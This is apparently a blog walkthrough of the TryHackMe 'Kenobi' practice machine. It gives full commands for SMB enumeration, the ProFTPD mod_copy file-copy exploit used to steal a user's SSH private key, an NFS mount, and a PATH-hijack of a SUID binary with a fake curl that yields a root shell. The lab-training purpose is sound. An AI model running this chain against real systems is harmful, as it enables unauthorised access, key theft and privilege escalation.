Today it is time to solve another challenge called “Kenobi”. It is available at TryHackMe for penetration testing practice. The challenge is an easy difficulty if you have the right basic knowledge and are attentive to little details that are required in the enumeration process. The breakdown of the Machine with redacted flags is as follow:
Level: Easy
Penetration Testing Methodology
·
Network Scanning
o
Nmap Scan
·
Enumeration
o
Connecting SMB Service
o
Acquiring Log File
·
Exploitation
o
Searching for exploit using
Searchsploit
o
Grabbing the Exploit Page
o
Connecting to FTP Service using
netcat
o
Copying id_rsa file
o
Mounting the remote directory
o
Grabbing id_rsa file
o
Connecting SSH service
o
Reading User Flag
·
Privilege Escalation
o
Enumerating SUID Permissions
o
Enumerating Binary using
strings
o
Creating malicious Curl
o
Adding malicious Curl in PATH
o
Running the Binary
o
Getting Root Shell
o
Reading Root Flag
Walkthrough
There are two flags in this machine to
discover. After Booting up the target machine from the TryHackMe:
Kenobi Page, an IP will be assigned to the machine and will be
visible on that page as well.
IP Address: 10.10.101.175
Network Scanning
We will start a Nmap scan with the -sV from
performing a Version Scan and -sC for default scripts on the target machine.
nmap -sV -sC 10.10.101.175
We have five services running on the target
machine. We have 21 (FTP), 22 (SSH), 80 (HTTP), 111 & 2049 (RPC), 139 &
445 (SMB).
Enumeration
To enumerate the SMB service, we will use
the smbclient with the IP address of the target machine as shown in the image.
We can see that there is a share by the name of anonymous. Upon accessing the share,
we find a text file by the name of log.txt. We transfer the log file to our
Kali machine to take a better look at it.
smbclient -L \\10.10.101.175
smbclient //10.10.101.175/anonymous
ls
get log.txt
Reading the log, we can see that it
contains the path for the id_rsa key stored on the target machine. Also, it
points to the fact that the FTP service running on the target machine is
ProFTPD.
cat log.txt
Exploitation
As we need to get our hands on the id_rsa
file and we see that we have the ProFTPD on the target, we need to figure out a
way to get access to that file through the FTP service. To check if we have any
known vulnerabilities regarding the ProFTPD using Searchsploit. We see that we
have the vulnerability named File Copy. We used the searchsploit to download
the exploit file using the -m option. Here, we see that we need to run two
significant commands: CPFR which means Copy From, and CPTO means Copy To. So we can use these commands to copy the
id_rsa file from its location to a place from where we can acquire it.
searchsploit ProFTPD 1.3.5
searchsploit -m 36742
cat 36742.txt
We used netcat to connect to the FTP
service on the target machine. We used the CPFR command to copy the id_rsa from
the home directory of the Kenobi user. Then we used the CPTO command to provide
the destination address for the id_rsa file. We transferred the file to /var
directory.
nc 10.10.101.175 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
Now that we have successfully transferred
the id_rsa into the var directory, we can mount the /var directory so that we
can access the id_rsa files on our local machine. We created a directory by the
name of /ignite inside the /mnt directory. Next, we used the mount command to
mount the remote var directory to our local ignite folder. Moving to the ignite
directory we found the id_rsa file. Changing the permissions of the id_rsa file
to make it ready to connect via SSH.
mkdir /mnt/ignite
mount 10.10.101.175:/var /mnt/ignite
cd /mnt/ignite/tmp
ls
cp id_rsa /root/
cd /root
chmod 600 id_rsa
With the help of the id_rsa key, we were
able to connect to the target machine as the Kenobi user. Here we were able to
read the first flag by the name of user.txt.
Privilege Escalation
Now that we have the session on the target
machine and we have the user flag. Let’s move on to enumerating the permissions
to figure out a way to elevate privileges. We used the find command to check
for all the binaries with permissions and found /usr/bin/menu to not be usually
found in Linux. It could be our way to root.
ssh -i id_rsa kenobi@10.10.101.175
cat user.txt
find / -perm -u=s -type f 2>/dev/null
We ran the menu binary to see that it
prints a menu with options such as status check, kernel version, and running
ifconfig. We ran the kernel version and got version 4.80. This binary must be
running the command in the background to get these outputs. To understand
better, we used the strings command to fetch all the human-readable snippets
from the binary and found that it uses the curl command to get the localhost. As
it doesn’t mention the full path of curl, we can create a malicious payload with
the name curl and add it into the path. This will make the binary run our
malicious file instead of the original curl.
/usr/bin/menu
strings /usr/bin/menu
We moved to the tmp directory and created a
binary invoking the /bin/sh and named it to curl. Then we changed the
permission of the binary to be executable. At last, we added this curl into the
local path using the export command. Now running the menu binary, we choose an
option from the menu and we got ourselves the root shell. We read the root flag
and conclude this machine.
cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu
Id
cat /root/root.txt
0 comments:
Post a Comment